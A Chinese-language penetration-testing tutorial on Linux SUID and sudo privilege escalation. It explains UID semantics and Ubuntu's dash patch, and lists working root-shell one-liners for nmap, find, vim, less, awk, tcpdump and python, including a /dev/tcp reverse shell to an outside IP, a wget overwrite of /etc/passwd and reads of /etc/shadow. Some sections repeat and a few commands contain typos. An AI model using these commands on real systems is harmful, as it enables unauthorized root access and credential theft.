前言:人们赞美流星,是因为它燃烧着走完自己的全部路程。
一、初识SUID
1.suid的简介
suid即set user id,是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。需要这种特殊权限的场景在Linux下很常见。
已知的可以用来提权的Linux可执行文件有:
CopyNmap、Vim、find、Bash、More、Less、Nano、cp
比如常用的ping命令。ping需要发送ICMP报文,而这个操作需要发送Raw Socket。在Linux 2.2引入CAPABILITIES前,使用Raw Socket是需要root权限的(当然不是说引入CAPABILITIES就不需要权限了,而是可以通过其他方法解决,这个后说),所以你如果在一些老的系统里ls -al $(which ping),可以发现其权限是-rwsr-xr-x,其中有个s位,这就是suid:
root@linux:# ls -al /bin/ping
-rwsr-xr-x 1 root root 44168 May 7 2021 /bin/ping
设置了s位的程序在运行时,其Effective UID将会设置为这个程序的所有者。比如,/bin/ping这个程序的所有者是root,它设置了s位,那么普通用户在运行ping时其Effective UID就是0,等同于拥有了root权限。
这里引入了一个新的概念Effective UID。Linux进程在运行时有三个UID:
Real UID 执行该进程的用户实际的UID,谁通过shell运行就是谁
Effective UID 程序实际操作时生效的UID,一般在进程启动时,直接由Real UID复制而来;或者是当进程对应的可执行文件的suid标志位为s时,为该文件的所属用户/组。所以利用suid文件进行提权需要2个前提:文件的所有者是 0 号或其他super user 文件拥有suid权限
在os层面目前常见发行版linux也会对suid的权限进行限制,具体可以参考p神这篇文章 ,把suid的提权简单抽象为一个c代码:
int main(int argc, char* argv[]) {
return system(argv[1]);
}
编译并赋予suid权限:
root@linux:/tmp# gcc suid.c -o suid
root@linux:/tmp# chmod +s suid
2./etc/sudoers 语法
root ALL=(ALL) ALL
root 用户可以从 ALL(任何)终端执行,充当ALL(任何)用户,并运行ALL(任何)命令。第一部分指定用户,第二部分指定可充当用户,第三部分指定 sudo 可运行的命令。
touhid ALL= /sbin/poweroff
输入 touchid 的密码,可以 sudo 执行 poweroff 命令。
touhid ALL = (root) NOPASSWD: /usr/bin/find
不输入密码,可以 sudo 执行 find 命令。
这里引入了一个新的概念Effective UID。Linux进程在运行时有三个UID:
Real UID 执行该进程的用户实际的UID
Effective UID 程序实际操作时生效的UID(比如写入文件时,系统会检查这个UID是否有权限)
Saved UID 在高权限用户降权后,保留的其原本UID(本文中不对这个UID进行深入探讨)
通常情况下Effective UID和Real UID相等,所以普通用户不能写入只有UID=0号才可写的/etc/passwd
;有suid的程序启动时,Effective UID就等于二进制文件的所有者,此时Real UID就可能和Effective UID不相等了。
有的同学说某某程序只要有suid权限,就可以提权,这个说法其实是不准确的。只有这个程序的所有者是0号或其他super user,同时拥有suid权限,才可以提权。
2. 查找具有 SUID 权限位文件
以下命令可以找到正在系统上运行的所有SUID可执行文件。准确的说,这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
也可以使用 sudo -l 命令列出当前用户可执行的命令
二、常见的提权方式
1.Nmap
nmap是一个经典的端口扫描工具,当目标主机存在版本在2.02-5.21之间的nmap且os的版本在上面受影响的范围内或更早就可以尝试使用这种方法进行提权。
nmap --interactive //进入交互模式
nmap -v //查看版本
nmap> !sh sh-3.2# whoami root
Metasploit也有利用SUID Nmap进行提权攻击:
exploit/unix/local/setuid_nmap
nmap提权失败可能出现的原因:
nmap在高版本中限制了suid权限
lua脚本中限制了suid权限
新版Linux系统对子进程的suid权限进行了限制
2.Find
如果find以SUID权限运行,所有通过find执行的命令都会以root权限运行。
$ find 1sh -exec bash -i >& /dev/tcp/192.168.100.173/5656 0>&1 \;
3.Vi/Vim
vim是linux下常见的文本编辑器,但是如果vim被配置了suid权限,那么运行时就会获取高权限进而对只有root用户才有权限读写的文件进行操作或获取高权限shell。在vi/vim中按下esc再输入一下内容即可获取到root的shell :
vim.tiny
Press ESC key
:set shell=/bin/sh
:shell
4.bash
bash -p
id
5.Less/More
Less 和 more 都可以执行提权的shell
less /etc/passwd
!/bin/sh
6.python/perl/ruby/lua/php/etc
python -c "importos;os.system('/bin/bash')
7.cp覆盖 /etc/shadow 或 /etc/passwd
8.mv
覆盖 /etc/shadow 或 /etc/passwd
9.其它方式
nano
nano /etc/passwd
awk
awk 'BEGIN {system("/bin/sh")}'
man
man passwd
!/bin/bash
wget
wget http://192.168.56.1:8080/passwd -O /etc/passwd
apache
仅可查看文件,不能弹 shell:
apache2 -f /etc/shadow
tcpdump
echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
python/perl/ruby/lua/php/etc
python
python -c "import os;os.system('/bin/bash')"
perl
exec "/bin/bash";
三、查找SUID权限文件
以下命令可以找到正在系统上运行的所有SUID可执行文件,命令将从 / 目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。
find / -user root -perm ``-4000
2``>/dev/null
find / -perm -u=s -type f ``2``>/dev/null
find / -user root -perm ``-4000
-exec ls -ldb {} \;
不同版本下linux的不同输出:
Linux发行版 | 输出结果 |
---|---|
Ubuntu 14.04 | uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data) |
Ubuntu 16.04 | uid=33(www-data) gid=33(www-data) groups=33(www-data) |
Ubuntu 18.04 | uid=33(www-data) gid=33(www-data) groups=33(www-data) |
CentOS 6 | uid=33(www-data) gid=33(www-data) groups=33(www-data) |
CentOS 8 | uid=33(www-data) gid=33(www-data) groups=33(www-data) |
Debian 6 | uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data) |
Debian 8 | uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data) |
Kali 2019 | uid=33(www-data) gid=33(www-data) groups=33(www-data) |
Ubuntu 16.04的不同之处就在dash目录:
下载其中的dash_0.5.8.orig.tar.gz
和dash_0.5.8-2.1ubuntu2.diff.gz
并分别解压,我们可以看到dash 0.5.8的原始代码,和Ubuntu对其做的patch。
我们对原始代码进行patch后,会发现多了一个setprivileged
函数:
void setprivileged(int on)
{
static int is_privileged = 1;
if (is_privileged == on)
return;
is_privileged = on;
/*
* To limit bogus system(3) or popen(3) calls in setuid binaries, require
* -p flag to work in this situation.
*/
if (!on && (uid != geteuid() || gid != getegid())) {
setuid(uid);
setgid(gid);
/* PS1 might need to be changed accordingly. */
choose_ps1();
}
}
on
的取值取决于用户是否传入了-p
参数, 而uid和gid就是当前进程的Real UID(GID)。可见,在on为false,且Real UID 不等于Effective UID的情况下,这里重新设置了进程的UID:
setuid(uid)
setuid函数用于设置当前进程的Effective UID,如果当前进程是root权限或拥有CAP_SETUID
权限,则Real UID和Saved UID将被一起设置。
所以,可以看出,Ubuntu发行版官方对dash进行了修改:当dash以suid权限运行、且没有指定-p
选项时,将会丢弃suid权限,恢复当前用户权限。
这样以来,dash在suid的表现上就和bash相同了,这也就解释了为什么在Ubuntu 16.04以后,我们无法直接使用SUID+**system**()
的方式来提权。
总结:
suid提权是渗透测试种经常遇到的情况,遇见的不同系统、不同环境都会有不同的提权方式,掌握多种提权方式是渗透的必备的。
参考链接:
https://www.leavesongs.com/PENETRATION/linux-suid-privilege-escalation.html